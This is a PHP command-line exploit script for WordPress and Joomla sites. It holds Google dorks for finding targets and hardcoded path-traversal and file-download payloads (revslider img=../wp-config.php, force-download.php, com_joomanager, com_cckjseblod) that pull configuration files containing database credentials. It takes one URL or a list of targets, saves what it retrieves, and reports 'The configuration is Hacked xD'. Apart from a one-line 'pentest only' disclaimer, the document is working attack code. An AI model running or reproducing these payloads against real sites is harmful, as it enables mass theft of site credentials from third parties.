wj_exploit.php

#!/usr/bin/php
<?php
/*
Autor:	Angel Cantu
Mail:	angel.cantu@sie-group.net

DISCLAIMER
	This script only is for pentest using, don't use this code for alterate o attack websites

DORKS
	inurl:'index.php?option=com_joomanager
	inurl:option=com_cckjseblod
	inurl:/wp-content/plugins/revslider/
	revslider.php 'index of
	inurl:force-download.php?file=wp-content/uploads
	inurl:wp-content/uploads inurl:force-download.php?file=
*/

function fileOrUrl($a)
	{
	$r=0;
	$path= getcwd()."/"; # current path
	if( file_exists($path.$a) )		$r=1; # file with urls
	else
		{
		$out= parse_url($a);
		$r= ( ($out["scheme"] && $out["host"]) ? 2:0);
		unset($out);
		}
	unset($path);

	return $r;
	}

function geturlname($a)
	{
	$patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
	preg_match_all($patron, $a, $buf);
	unset($patron);
	return $buf[2][0];
	}

function getUrl($a)
	{
	$patron= '/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/';
	preg_match_all($patron, $a, $buf);
	unset($patron);
	return 'http'.($buf[1][0] ? 's':'').'://'.$buf[2][0];
	}

function attackLibrary( $a )
	{
	$joomla= array(
		"name"=>"Joomla",
		"0"=>array(
			"name"=>"joom_manager",
			"exploit"=>"/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php"
			),
		"1"=>array(
			"name"=>"joom_download",
			"exploit"=>"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
			)
		);
	$wp= array(
		"name"=>"Wordpress",
		"0"=>array(
			"name"=>"wp_revslider",
			"exploit"=>"/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
			),
		"1"=>array(
			"name"=>"wp_forcedownload",
			"exploit"=>"/force-download.php?file=wp-config.php"
			)
		);
	return (!strcmp($a, "w") ? $wp:$joomla);
	}

function attackSend($mode, $target)
	{
	$path= getcwd()."/";
	$a= attackLibrary($mode);
	echo "\n** ". $a["name"]. " Attacking..\n";

	foreach( $a as $key=>$val )
		{
		if( strcmp($key, "name") )
			{
			echo "\n[". $val["name"]. "] Starting attack \"". $val["name"]. "\"..";
			# $cmd= "/usr/bin/curl \"".$target.$val["exploit"]."\" -O ".$path.$target."_".$key.".log";
			# system($cmd); # explot

			$buf= @file_get_contents($target.$val["exploit"]);
			$fp= fopen($path.geturlname($target)."_".$key.".log", "w");
			fwrite($fp, $buf);
			fclose($fp);

			if( !filesize($path.geturlname($target).'_'.$key.'.log') )
				echo "\n[ERROR] The config is protected..";
			else
			echo "\n[DONE] The configuration is Hacked xD";
			unset($cmd, $fp, $buf);
			}
		}
	return;
	}

function cleanjump( $data )
	{
	return substr($data, 0, -1);
	}

if( $argc!=4 )
	echo "\n[ERROR] Need argument, try: -a w URL";
else
	{
	if( !($op=fileOrUrl($argv[3])) )
		echo "\n[ERROR] The argument isn't a file neither URL..";
	else
		{
		echo "\n[Done] You provide a ". ($op==1 ? "File with URLs":"URL Web");

		if( strcmp($argv[1], "-a") ) # not set attack type
			echo "\n[ERROR] You don't set attack type, use: \"-a w\" (wordpress) or \"-a j\" (joomla)";
		else if( strcmp($argv[2], "w") && strcmp($argv[2], "j") )
			echo "\n[ERROR] This script only use ttacks with: \"w\" (wordpress) or \"j\" (joomla)";
		else # done
			{
			if( $op==2 ) # url
				{
				$target= geturl($argv[3]); # cleaning
				$path= getcwd(). "/";
				echo "\n[URL] Target detected: ". $target;
				echo "\n[Path] Working on: ". $path;
				echo "\n\n";
				attackSend($argv[2], $target);
				}
			else # file
				{
				$fp= fopen($path.$argv[3], "r");
				$urls= array();
				while( ($buf=fgets($fp, (5*1024)))!==FALSE )
					$urls[]= cleanjump($buf);

				echo "\n[FILE] Detected: ". count($urls). " targets..";
				echo "\n[LIST] Targets List:\n";

				foreach( $urls as $key=>$val ) 	echo "\n". $val;
				foreach( $urls as $key=>$val ) 	attackSend($argv[2], $val);
				unset($urls);
				}
			}
		}
	}

echo "\n\n";
exit;
?>